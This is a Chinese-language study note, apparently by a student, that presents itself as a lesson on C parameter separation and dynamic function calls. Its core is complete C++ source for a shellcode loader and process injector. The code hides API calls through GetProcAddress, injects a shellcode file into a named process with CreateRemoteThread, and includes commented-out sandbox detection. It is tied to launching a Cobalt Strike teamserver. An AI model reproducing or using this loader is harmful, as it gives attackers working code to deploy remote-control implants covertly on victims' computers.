今天我们学习了C语言的参数分离和动态函数调用,我深入理解了C语言的灵活性和高效性。参数分离技术能有效处理输入参数,使得代码更加模块化和可重用。动态函数调用机制让我能够在运行时动态地调用函数,增强了程序的灵活性和扩展性。此外,通过对注入模块的学习,我掌握了如何在C语言中实现模块化编程,从而使得代码维护和升级变得更加简便。这些知识将对我今后的编程工作产生重要影响,提高我的编程技能和代码质量。
1.参数分离:
参数分离是指将代码中的配置数据从业务逻辑中分离出来,存储在独立的配置文件或数据库中。这样,当需要修改配置数据时,无需修改代码,只需修改配置文件或数据库中的数据即可。这种方式提高了代码的灵活性和可维护性,降低了代码的复杂度和维护成
本。
2.注入模块:
在网络安全领域,注入攻击是一种常见的攻击手段尤其是在Web应用程序中。注入攻击的本质是利用输入数据未被正确验证和过滤,从而使得攻击者能够执行恶意的代码或命令。本报告将详细介绍注入攻击中的一个重要模块——SQL注入,包括其原理、危害、常见类型以及防御措施。
3.动态调用:
3.1VirtualAlloc动态调用:
在某些情况下,我们可能需要在程序运行时动态地分配内存。在Windows系统中,可以使VirtualAll oc函数来实现这一功能。
3.2其他敏感API的动态调用:
在实际开发中,有时我们可能需要动态调用一些敏感的API,比如用于文件操作、网络通信或系统控制的A PI。这些API可能在某些环境下被限制使用,因此需
要动态加载并调用。
4.实现上述功能的代码:
头文件代码:
#pragma once
#include<Windows.h>
#include <tlhelp32.h>
#include <fstream>
#include<iostream>
using namespace std;
typedef LPVOID(WINAPI* fn_VirtualAllocEx)(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
typedef HANDLE(WINAPI* fn_OpenProcess)(
_In_ DWORD dwDesiredAccess,
_In_ BOOL bInheritHandle,
_In_ DWORD dwProcessId
);
typedef LPVOID(WINAPI* fn_VirtualAlloc)(
_In_opt_ LPVOID lpAddress,
_In_ SIZE_T dwSize,
_In_ DWORD flAllocationType,
_In_ DWORD flProtect
);
typedef HANDLE(WINAPI* fn_CreateThread)(
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ SIZE_T dwStackSize,
_In_ LPTHREAD_START_ROUTINE lpStartAddress,
_In_opt_ __drv_aliasesMem LPVOID lpParameter,
_In_ DWORD dwCreationFlags,
_Out_opt_ LPDWORD lpThreadId
);
功能代码:
#include "myFunc.h"
//字符转宽字符
wchar_t* AtoW(char** a) {
setlocale(LC_ALL, "");
// 原始的char*字符串
char* char_str = *a;
// 确定所需的wchar_t缓冲区的大小
size_t wchar_size = mbstowcs(NULL, char_str, 0) + 1;
if (wchar_size == (size_t)-1) {
perror("mbstowcs");
return 0;
}
// 分配wchar_t缓冲区
wchar_t* wchar_str = (wchar_t*)malloc(wchar_size * sizeof(wchar_t));
if (wchar_str == NULL) {
perror("malloc");
return 0;
}
// 执行转换
mbstowcs(wchar_str, char_str, wchar_size);
return wchar_str;
}
//读取shellcode
char* ReadFile(SIZE_T* length, char* file) {
char* filename = file;
ifstream infile;
infile.open(filename, ios::out | ios::binary);
infile.seekg(0, infile.end);
*length = infile.tellg();
infile.seekg(0, infile.beg);
char* data = new char[*length];
if (infile.is_open()) {
cout << "reading from the file" << endl;
infile.read(data, *length);
}
return data;
}
//注入进程
void Inject(char* argv[]) {
SIZE_T length = 0;
char* data;
data = ReadFile(&length, argv[2]);
/*LPVOID mem = VirtualAlloc(NULL, length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, data, length);
EnumChildWindows(NULL, (WNDENUMPROC)mem, NULL);*/
HANDLE snapshot_handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //快照(留像)
if (snapshot_handle != INVALID_HANDLE_VALUE) {
// 枚举进程
PROCESSENTRY32 process_entry;
process_entry.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(snapshot_handle, &process_entry)) {
do {
// 将进程名转换为宽字符串
std::wstring extFileName(process_entry.szExeFile);
wchar_t* exename = AtoW(&argv[3]);
// 如果进程名包含 "msedge.exe" 则进行以下操作 std::string::npos == 当初遍历的进程名
if (extFileName.find(exename) != std::string::npos) {
// 打开进程
fn_OpenProcess myOpenProcess = (fn_OpenProcess)GetProcAddress(LoadLibraryA("kernel32.dll"), "OpenProcess");
HANDLE process_handle = myOpenProcess(PROCESS_ALL_ACCESS, FALSE, process_entry.th32ProcessID);
if (process_handle != NULL) {
// 在远程进程中分配内存
fn_VirtualAllocEx myVirtualAllocEx = (fn_VirtualAllocEx)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAllocEx");
LPVOID remote_buffer = myVirtualAllocEx(process_handle, NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (remote_buffer != NULL) {
SIZE_T bytes_written;
// 将 code 写入远程进程内存
if (WriteProcessMemory(process_handle, remote_buffer, data, length, &bytes_written)) {
std::cout << "Remote buffer address: " << remote_buffer << std::endl;
// 在远程进程中创建线程执行 code
HANDLE remote_thread = CreateRemoteThread(process_handle, NULL, 0, (LPTHREAD_START_ROUTINE)remote_buffer, NULL, 0, NULL);
if (remote_thread != NULL) {
// 等待线程结束
WaitForSingleObject(remote_thread, INFINITE);
CloseHandle(remote_thread);
}
}
// 关闭远程内存句柄
CloseHandle(remote_buffer);
}
// 关闭进程句柄
CloseHandle(process_handle);
}
}
} while (Process32Next(snapshot_handle, &process_entry)); // 继续枚举下一个进程
}
// 关闭进程快照句柄
CloseHandle(snapshot_handle);
}
}
//正常上线
VOID Normal(char* file) {
SIZE_T length = 0;
char* data = NULL;
data = ReadFile(&length, file);
fn_VirtualAlloc myVirtualAlloc = (fn_VirtualAlloc)GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualAlloc");
fn_CreateThread myCreateThread = (fn_CreateThread)GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateThread");
LPVOID shell_addr = myVirtualAlloc(NULL, length, 0x00001000, 0x40);
memcpy(shell_addr, data, length);
HANDLE HThread = myCreateThread(0, 0, (LPTHREAD_START_ROUTINE)shell_addr, 0, 0, 0);
WaitForSingleObject(HThread, -1);
}
//LPVOID == Long Point VOID
//int Check_MulDiv_1() {
// // Call MulDiv with specific arguments
// int result = MulDiv(1, 0x80000000, 0x80000000);
//
// // Check if the result matches the expected value
// if (result != 2) {
// std::cout << "MulDiv evasion method detected: Wine environment." << std::endl;
// }
// else {
// std::cout << "MulDiv evasion method not detected." << std::endl;
// }
//
// return 0;
//}
//int Check_MulDiv_2() {
// // Check for the existence of Wine's exclusive APIs
// HMODULE hKernel32 = GetModuleHandle(L"kernel32.dll");
// FARPROC wineGetUnixFileName = GetProcAddress(hKernel32, "wine_get_unix_file_name");
// HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
// FARPROC wineGetHostVersion = GetProcAddress(hNtdll, "wine_get_host_version");
//
// if (wineGetUnixFileName || wineGetHostVersion) {
// std::cout << "Wine's exclusive APIs detected: Wine environment." << std::endl;
// }
// else {
// std::cout << "Wine's exclusive APIs not detected." << std::endl;
// }
//
// return 0;
//}
// 远控的上线程序会变成你的注入目标程序
// User,管理员,System
// 主函数
int main(int argc, char* argv[]) {
if (strcmp(argv[1], "-i") == 0) {
if (argc == 4) {
printf("Injecting!!!\n");
Inject(argv);
}
else {
wprintf(L"注入方式:-i 路径 进程名\n");
}
}
if (strcmp(argv[1], "-d") == 0) {
Normal(argv[2]);
};
if (strcmp(argv[1], "-h") == 0) {
printf("-i Inject\n-h help\n-d normal\n");
}
/*printf("%d\n", argc);
printf("%s", argv[1]);*/
return 0;
}
截图:
打开finalShell用命令行启动teamserver:
连接cobaltstrike: